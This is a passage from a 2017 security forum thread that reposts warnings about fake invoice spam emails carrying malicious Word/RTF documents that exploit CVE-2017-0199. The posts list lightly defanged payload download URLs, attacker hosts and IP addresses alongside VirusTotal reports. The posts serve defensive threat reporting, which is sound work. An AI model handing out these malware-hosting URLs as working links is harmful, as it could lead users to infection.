74.122.121.8


*** https://www.virustot...sis/1480617465/
 

:ninja: :ninja:    :grrr:


Edited by AplusWebMaster, 22 June 2017 - 07:12 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1950 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 26 June 2017 - 04:17 AM

FYI...

Fake 'INVOICE' SPAM - delivers malware
- https://myonlinesecu...eliver-malware/
26 Jun 2017 - "An email with the subject of '*CONFIRM ORDER AND REVISE INVOICE*' pretending to come from admin@ random company with a malicious word doc attachment. This word doc is actually an RTF file that uses what looks like the CVE-2017-0199 exploit...

Screenshot: https://myonlinesecu...ISE-INVOICE.png

Order Ref-22550.doc - Current Virus total detections 16/56*. Neither MALWR nor JoeSandbox could get any malicious content from it. Payload Security is still -down- this morning for maintenance that was hoped to be done over the weekend.
Update: after a bit of manual editing & investigating I was able to find the download location:
  https ://dev.null .vg/OtoGQj9.hta (VirusTotal 13/56**) ( MALWR***) which should deliver
  http ://allafrance .com/ziko.exe but is currently giving me a 404... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1498451330/
Order Ref-22550.doc

** https://www.virustot...sis/1498457573/
OtoGQj9.hta

*** https://malwr.com/an...mYzMjAzNjBkNjY/

dev.null .vg: 104.27.187.29: https://www.virustot...29/information/
> https://www.virustot...09263/analysis/
104.27.186.29: https://www.virustot...29/information/
> https://www.virustot...09263/analysis/

allafrance .com: 85.14.171.25: https://www.virustot...25/information/
> https://www.virustot...7eb4e/analysis/
___

Fake 'invoice' SPAM - links to malware doc file
- https://myonlinesecu...eliver-malware/
26 Jun 2017 - "... An email with the subject of 'Cust # 880767-00057' [redacted] pretending to come from Jackie Fill <vs1.kirchdorf@ eduhi .at> (probably random senders) with a -link- that downloads a malicious word doc. The subject and the link that appears in body of the email has the recipients name in it but the actual link doesn’t. The link in this case went to
 http ://facyl .com.br/Invoices-payments-and-questions-JBQHL-933-907247/ where it downloaded a macro enabled word doc (the link is very slow & does time out)...

Screenshot: https://myonlinesecu...80767-00057.png

Invoice-NUVKHC-227-980463.doc - Current Virus total detections 9/56*... Joesandbox** shows connections to numerous sites where a malicious file is downloaded using PowerShell, including:
 http ://carbeyondstore .com/cianrft/ > 72.52.246.64
 http ://motorgirlstv .com/kdm/ > 202.191.62.208
 http ://nonieuro .com/xauqt/ > 216.104.189.202
 http ://pxpgraphics .com/espzyurt/ > 69.65.3.206
 http ://studiogif .com.br/jedtvuziky/ > 192.185.216.153
Eventually giving an .exe file (VirusTotal 10/61***)... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment -or- link in an email, unless you are expecting it..."
* https://www.virustot...sis/1498480442/

** https://jbxcloud.joe...s/297919/1/html

*** https://www.virustot...sis/1498478920/

facyl .com.br: 187.45.187.130: https://www.virustot...30/information/
> https://www.virustot...b44e5/analysis/
 

:ninja: :ninja:    :grrr:


Edited by AplusWebMaster, 27 June 2017 - 06:04 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.




Member of UNITE
Support SpywareInfo Forum - click the button